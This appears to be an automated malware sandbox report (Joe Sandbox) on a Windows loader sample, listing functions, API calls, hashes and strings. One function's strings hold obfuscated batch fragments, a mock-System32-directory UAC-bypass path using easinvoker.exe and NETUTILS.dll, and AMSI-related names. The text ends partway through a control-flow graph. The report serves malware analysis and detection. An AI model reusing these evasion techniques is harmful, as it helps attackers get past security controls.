                                                                                                                              • Opcode Fuzzy Hash: ad32a12dd2a313207f2abf6604a44fcdea95e0bf229231ac431631d10f8221b9
                                                                                                                              • Instruction Fuzzy Hash: 87F0E27E6093243EE622612C5C80EFFA29DCFC27A1F04462DF558E6280EB618804C7B2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028B7966 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24librarymemorynativeCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 028B7975
                                                                                                                              • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 028B797B
                                                                                                                              • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 028B799B
                                                                                                                              Strings
                                                                                                                              • C:\Windows\System32\ntdll.dll, xrefs: 028B7970
                                                                                                                              • NtAllocateVirtualMemory, xrefs: 028B796B
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                                                                              • String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
                                                                                                                              • API String ID: 421316089-2206134580
                                                                                                                              • Opcode ID: 7715d61cb634e5b73a7fca2370174185977837a9fb4fd366eaa443c81ef8b0cb
                                                                                                                              • Instruction ID: 74d15b728013adabe1b00dcb173907a324d3ef8958db373b1d1b3a996d86855e
                                                                                                                              • Opcode Fuzzy Hash: 7715d61cb634e5b73a7fca2370174185977837a9fb4fd366eaa443c81ef8b0cb
                                                                                                                              • Instruction Fuzzy Hash: 34E09ABA64030CBFEB01DEACDC85EEA77ACAB0C611F444415BA19D7205DA74E9508BB9
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028B7968 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23librarymemorynativeCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 028B7975
                                                                                                                              • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 028B797B
                                                                                                                              • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 028B799B
                                                                                                                              Strings
                                                                                                                              • C:\Windows\System32\ntdll.dll, xrefs: 028B7970
                                                                                                                              • NtAllocateVirtualMemory, xrefs: 028B796B
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressAllocateHandleMemoryModuleProcVirtual
                                                                                                                              • String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
                                                                                                                              • API String ID: 421316089-2206134580
                                                                                                                              • Opcode ID: fb2a588f65785d1d8c25c56cd1d512b96324af4dea9b87a8bc35d5e689460587
                                                                                                                              • Instruction ID: 4e32b8d195d01925198652ea0af06ddb006dc1d1608538b07860d39d815c2ed5
                                                                                                                              • Opcode Fuzzy Hash: fb2a588f65785d1d8c25c56cd1d512b96324af4dea9b87a8bc35d5e689460587
                                                                                                                              • Instruction Fuzzy Hash: EDE09ABA54030CBFEB01DEACD885EDA77ACAB0C611F444415BA19D7205DA74E5508BB9
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028BC4DC Relevance: 7.6, APIs: 5, Instructions: 80nativefileCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 028A4EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 028A4EF2
                                                                                                                              • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,028BC5AC), ref: 028BC517
                                                                                                                              • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,028BC5AC), ref: 028BC547
                                                                                                                              • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 028BC55C
                                                                                                                              • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 028BC588
                                                                                                                              • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 028BC591
                                                                                                                                • Part of subcall function 028A4C24: SysFreeString.OLEAUT32(028BD42C), ref: 028A4C32
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1897104825-0
                                                                                                                              • Opcode ID: c2673af6e6d17123c457fd90231afba8861ff19bcbfecf9c61ab504635822c28
                                                                                                                              • Instruction ID: 0dcf7844a6b309b9e1a9489e9020ae0ac03a6c42b76b23827dae3d7b0f71fbf5
                                                                                                                              • Opcode Fuzzy Hash: c2673af6e6d17123c457fd90231afba8861ff19bcbfecf9c61ab504635822c28
                                                                                                                              • Instruction Fuzzy Hash: 96219279A507087EEB11EAD8CC52FDEB7BDAF48700F540466B604E72C0DAB4BA058B65
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028BC8AC Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111networkCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 028BC9EA
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CheckConnectionInternet
                                                                                                                              • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                              • API String ID: 3847983778-3852638603
                                                                                                                              • Opcode ID: 8bca162db6eb9b5cac4aab698178f218020805c57a7b2406087bec1aa5940453
                                                                                                                              • Instruction ID: ac72e9c906e46a091d481e12f712ed87ee479560d3e9dc7ee3551025e403c5c6
                                                                                                                              • Opcode Fuzzy Hash: 8bca162db6eb9b5cac4aab698178f218020805c57a7b2406087bec1aa5940453
                                                                                                                              • Instruction Fuzzy Hash: 6B410B3DA102489FFF01EAA8D850EDEB3B6AF49700F205426E041F7351DEB4A9158F51
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028BC3F6 Relevance: 6.1, APIs: 4, Instructions: 81nativefileCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 028A4EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 028A4EF2
                                                                                                                              • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,028BC4CA), ref: 028BC437
                                                                                                                              • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 028BC471
                                                                                                                              • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 028BC49E
                                                                                                                              • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 028BC4A7
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3764614163-0
                                                                                                                              • Opcode ID: fc0728b822d4c25685fb9af56ea334971e15fa0bd2af9697abdbfdf926e71297
                                                                                                                              • Instruction ID: d4b42aa5f0d668c47762e90257d7e49c8a1f7930c00e8ba8297c0679ba9d1af9
                                                                                                                              • Opcode Fuzzy Hash: fc0728b822d4c25685fb9af56ea334971e15fa0bd2af9697abdbfdf926e71297
                                                                                                                              • Instruction Fuzzy Hash: 2121E379A40208BEFB11EA94CC52FDEB7BDEF44700F604466B604F71D0D7B46E048A55
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028BC3F8 Relevance: 6.1, APIs: 4, Instructions: 80nativefileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 028A4EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 028A4EF2
                                                                                                                              • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,028BC4CA), ref: 028BC437
                                                                                                                              • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 028BC471
                                                                                                                              • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 028BC49E
                                                                                                                              • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 028BC4A7
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3764614163-0
                                                                                                                              • Opcode ID: a0e85ca408c3caab7896abefb1a3df81b045cd00134cfebd5ea9ce561e940206
                                                                                                                              • Instruction ID: 8cd59467b3eee8e9b61852e63aba4d88c9b788ce0e83bba9ee560c3c916629dd
                                                                                                                              • Opcode Fuzzy Hash: a0e85ca408c3caab7896abefb1a3df81b045cd00134cfebd5ea9ce561e940206
                                                                                                                              • Instruction Fuzzy Hash: AA21E179A40208BEEB11EA94CC52FDEB7BDEF44B00F604466B604F72D0DBB46E048A55
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028BC368 Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 028A4EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 028A4EF2
                                                                                                                              • RtlInitUnicodeString.N(?,?,00000000,028BC3E2), ref: 028BC390
                                                                                                                              • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,028BC3E2), ref: 028BC3A6
                                                                                                                              • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,028BC3E2), ref: 028BC3C5
                                                                                                                                • Part of subcall function 028A4C24: SysFreeString.OLEAUT32(028BD42C), ref: 028A4C32
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: String$Path$AllocDeleteFileFreeInitNameName_Unicode
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1694942484-0
                                                                                                                              • Opcode ID: eb4e6052247caa17d509a65b7da48ae84483131401502b1c073851f08906478d
                                                                                                                              • Instruction ID: 1ab370790abef25bedb2ed918f9bd03a75f652bfae6b53039dc56f564ecea4aa
                                                                                                                              • Opcode Fuzzy Hash: eb4e6052247caa17d509a65b7da48ae84483131401502b1c073851f08906478d
                                                                                                                              • Instruction Fuzzy Hash: 8601E57D940208BEEB01EAA4CD51FCD73EDEF4C700FA04466A515E6280EA74AB048A65
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028B6D84 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 028B6D28: CLSIDFromProgID.OLE32(00000000,?,00000000,028B6D75,?,?,?,00000000), ref: 028B6D55
                                                                                                                              • CoCreateInstance.OLE32(?,00000000,00000005,028B6E68,00000000,00000000,028B6DE7,?,00000000,028B6E57), ref: 028B6DD3
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateFromInstanceProg
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2151042543-0
                                                                                                                              • Opcode ID: 49c5b92381524fae22ebcc502e34f8279918d2fa430ce74dd7368b51cc89bfa8
                                                                                                                              • Instruction ID: cdcee1ffc15f45e792420e2c95b1a2d1d1b27f909f63602670a49cf478f6042c
                                                                                                                              • Opcode Fuzzy Hash: 49c5b92381524fae22ebcc502e34f8279918d2fa430ce74dd7368b51cc89bfa8
                                                                                                                              • Instruction Fuzzy Hash: 3E01D47C6047046EFB06DF65DC229AF7BADEF49B10FA10439F401E2740FA75A910CA65
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028B9E10 Relevance: 1.5, APIs: 1, Instructions: 17processCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 028B9B94: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,028B9E1B,?,?,028B9EAD,00000000,028B9F89), ref: 028B9BA8
                                                                                                                                • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 028B9BC0
                                                                                                                                • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 028B9BD2
                                                                                                                                • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 028B9BE4
                                                                                                                                • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 028B9BF6
                                                                                                                                • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 028B9C08
                                                                                                                                • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 028B9C1A
                                                                                                                                • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Process32First), ref: 028B9C2C
                                                                                                                                • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 028B9C3E
                                                                                                                                • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 028B9C50
                                                                                                                                • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 028B9C62
                                                                                                                                • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 028B9C74
                                                                                                                                • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 028B9C86
                                                                                                                                • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Module32First), ref: 028B9C98
                                                                                                                                • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 028B9CAA
                                                                                                                                • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 028B9CBC
                                                                                                                                • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 028B9CCE
                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 028B9E21
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressProc$CreateHandleModuleSnapshotToolhelp32
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2242398760-0
                                                                                                                              • Opcode ID: 5ff9c8668c04de50a6fb2288474f62c7e68611a653c35591d5a7f667942963ba
                                                                                                                              • Instruction ID: 8ad5f602fed95c9723c607d491b7cc43517a0f54569601d92920e0d39c40af0e
                                                                                                                              • Opcode Fuzzy Hash: 5ff9c8668c04de50a6fb2288474f62c7e68611a653c35591d5a7f667942963ba
                                                                                                                              • Instruction Fuzzy Hash: AAC0806A61113017CB1066F82CC84D7574DDD4D0B77150462F60DD3201E3554C1059A0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028C1AC0 Relevance: 46.7, APIs: 2, Strings: 23, Instructions: 2959sleepprocessCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 028B7BE8: LoadLibraryW.KERNEL32(?,00000000,028B7C9A), ref: 028B7C18
                                                                                                                                • Part of subcall function 028B7BE8: GetModuleHandleW.KERNEL32(?,?,00000000,028B7C9A), ref: 028B7C1E
                                                                                                                                • Part of subcall function 028B7BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 028B7C37
                                                                                                                                • Part of subcall function 028BC3F8: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,028BC4CA), ref: 028BC437
                                                                                                                                • Part of subcall function 028BC3F8: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 028BC471
                                                                                                                                • Part of subcall function 028BC3F8: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 028BC49E
                                                                                                                                • Part of subcall function 028BC3F8: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 028BC4A7
                                                                                                                                • Part of subcall function 028A7E18: GetFileAttributesA.KERNEL32(00000000,?,028BE0EE,ScanString,02905344,028C8FEC,OpenSession,02905344,028C8FEC,ScanString,02905344,028C8FEC,UacScan,02905344,028C8FEC,UacInitialize), ref: 028A7E23
                                                                                                                              • Sleep.KERNEL32(00001770,UacScan,02905344,028C8FEC,ScanString,02905344,028C8FEC,OpenSession,02905344,028C8FEC,ScanBuffer,02905344,028C8FEC,OpenSession,02905344,028C8FEC), ref: 028C3094
                                                                                                                                • Part of subcall function 028BC368: RtlInitUnicodeString.N(?,?,00000000,028BC3E2), ref: 028BC390
                                                                                                                                • Part of subcall function 028BC368: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,028BC3E2), ref: 028BC3A6
                                                                                                                                • Part of subcall function 028BC368: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,028BC3E2), ref: 028BC3C5
                                                                                                                              • WinExec.KERNEL32(00000000,028C9524), ref: 028C436D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FilePath$NameName_$AddressAttributesCloseCreateDeleteExecHandleInitLibraryLoadModuleProcSleepStringUnicodeWrite
                                                                                                                              • String ID: .url$@echo offset "Nnqr=set "%Nnqr%"njyC=="%Nnqr%"qkMvMLsfma%njyC%http"%Nnqr%"dbvWEsxWns%njyC%rem "%Nnqr%"NpzRZtRBVV%njyC%Cloa"%Nnqr%"ftNVZzSZxa%njyC%/Bat"%Nnqr%"TwupSEtIWD%njyC%gith"%Nnqr%"yIGacXULig%njyC%k"%Nnqr%"uGlGnqCSun%njyC%h2sh"%Nnqr%"FU$C:\Users\Public\$C:\Users\Public\alpha.exe$C:\Windows \System32\NETUTILS.dll$C:\Windows \System32\aaa.bat$C:\Windows \System32\easinvoker.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\extrac32.exe /C /Y $HotKey=$IconIndex=$Initialize$O.bat$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$[InternetShortcut]$a.bat$er.e$s.d
                                                                                                                              • API String ID: 102611719-2667577771
                                                                                                                              • Opcode ID: b12c4e4c5c14fe103cbc1102f646cbdce927c824a992972dd4b8e9dfcdb1e3ce
                                                                                                                              • Instruction ID: 909d31e07a9a5a92cd5be8758719f442ce25fff2ef57693f226e79087b60bc88
                                                                                                                              • Opcode Fuzzy Hash: b12c4e4c5c14fe103cbc1102f646cbdce927c824a992972dd4b8e9dfcdb1e3ce
                                                                                                                              • Instruction Fuzzy Hash: 1A530E3DA502588FEF11EB68D890EADB3B6BB45700F2444E5A009E7754DFB0AE85CF52
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028C4EFE Relevance: 18.4, APIs: 2, Strings: 8, Instructions: 941processCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 9828 28c4efe-28c53da call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a4964 call 28a4698 call 28bd318 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 9965 28c53e0-28c565b call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a48b0 9828->9965 9966 28c53db call 28b7be8 9828->9966 10039 28c6190-28c638f call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a48b0 9965->10039 10040 28c5661-28c5cb3 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a47b0 call 28a4964 WinExec call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4964 call 28a4698 call 28b9e70 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a3694 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 9965->10040 9966->9965 10157 28c6b54-28c6cd7 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a48b0 10039->10157 10158 28c6395-28c69b4 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 28a4964 call 28a4698 call 28a47b0 call 28a4964 call 28a4698 call 28b7be8 call 28a4824 call 